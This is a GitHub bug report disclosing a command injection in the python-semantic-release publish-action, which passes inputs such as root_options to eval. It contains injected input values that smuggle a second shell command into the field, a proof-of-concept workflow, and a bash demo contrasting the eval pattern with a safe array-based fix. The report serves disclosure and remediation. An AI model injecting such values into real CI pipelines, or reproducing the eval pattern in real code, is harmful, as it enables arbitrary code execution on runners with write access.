Bug Report
Description
The publish-action GitHub Action uses eval to execute user-supplied input values, including root_options and indirectly tag, which allows for command injection. This can lead to arbitrary code execution within the CI runner context, especially dangerous when actions are used in workflows with write permissions.
Expected behavior
User-supplied inputs should be treated as arguments only and not executed as shell code. Commands should be constructed and invoked safely using arrays or quoted strings without eval.
Actual behavior
Inputs are interpolated into a string and passed to eval, allowing arbitrary shell commands to be executed. Example:
```yaml
with:
  root_options: "-h; echo 'INJECTED' > injected.txt"
```
This results in a new file being created by the injected command, confirming the ability to execute arbitrary commands.
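The eval pattern described under Actual behavior beside the array-based invocation that Expected behavior asks for, as an added example that is not the action's own code: fake_cli stands in for the CLI the action wraps, root_options and tag are the report's input names, and the payload is reduced to a harmless echo so the difference is visible in the output.

```bash
#!/usr/bin/env bash
# Added example, not the publish-action's own code. Assumes bash (arrays, here-strings).
set -eo pipefail

# Stand-in for the CLI the action wraps: prints each argv element in brackets so it is
# visible whether the input was evaluated as shell syntax or passed as plain arguments.
fake_cli() {
  local arg
  for arg in "$@"; do
    printf '[%s]\n' "$arg"
  done
}

# Vulnerable pattern (the one the report describes): inputs are interpolated into a
# string and handed to eval, so ';', '>', '$(...)' etc. in root_options or tag become
# shell syntax and run with the CI runner's permissions.
run_with_eval() {
  local root_options="$1" tag="$2"
  eval "fake_cli $root_options version --tag $tag"
}

# Hardened pattern: build argv in an array. Each input can only ever be an argument
# to fake_cli, never a second command. If root_options must stay a space-separated
# option list, split it with read -a (no metacharacter interpretation) instead of eval.
run_with_array() {
  local root_options="$1" tag="$2"
  local -a opts=() cmd=()
  read -r -a opts <<<"$root_options"
  cmd=(fake_cli "${opts[@]}" version --tag "$tag")
  "${cmd[@]}"
}

# Counts output lines that begin with the marker word, i.e. how often the injected
# 'echo INJECTED' actually executed as a command rather than being passed as text.
count_injected() {
  printf '%s\n' "$1" | grep -c '^INJECTED' || true
}

demo() {
  local payload="-h; echo INJECTED"   # harmless stand-in for the report's payload
  echo '--- eval (payload executes) ---';  run_with_eval  "$payload" v1.0.0
  echo '--- array (payload is an argument) ---'; run_with_array "$payload" v1.0.0
}
demo
```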
Environment
- Action version: v9.21.1
Configuration
GitHub Actions Job Definition
```yaml
name: PoC - eval injection
on:
  workflow_dispatch:
jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - name: checkout
        uses: actions/checkout@v4
      - name: test injection
        uses: python-semantic-release/publish-action@v9.21.1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          root_options: "-h; echo 'INJECTED COMMAND EXECUTED' > injected.txt; echo "
      - name: upload other artifact
        uses: actions/upload-artifact@v4
        with:
          name: injected-output
          path: injected.txt
```
Execution Log
Please check https://github.com/mleblebici/test-repo/actions/runs/14974445832/job/42063064035
Additional context
Workflow => https://github.com/mleblebici/test-repo/blob/main/.github/workflows/test.yml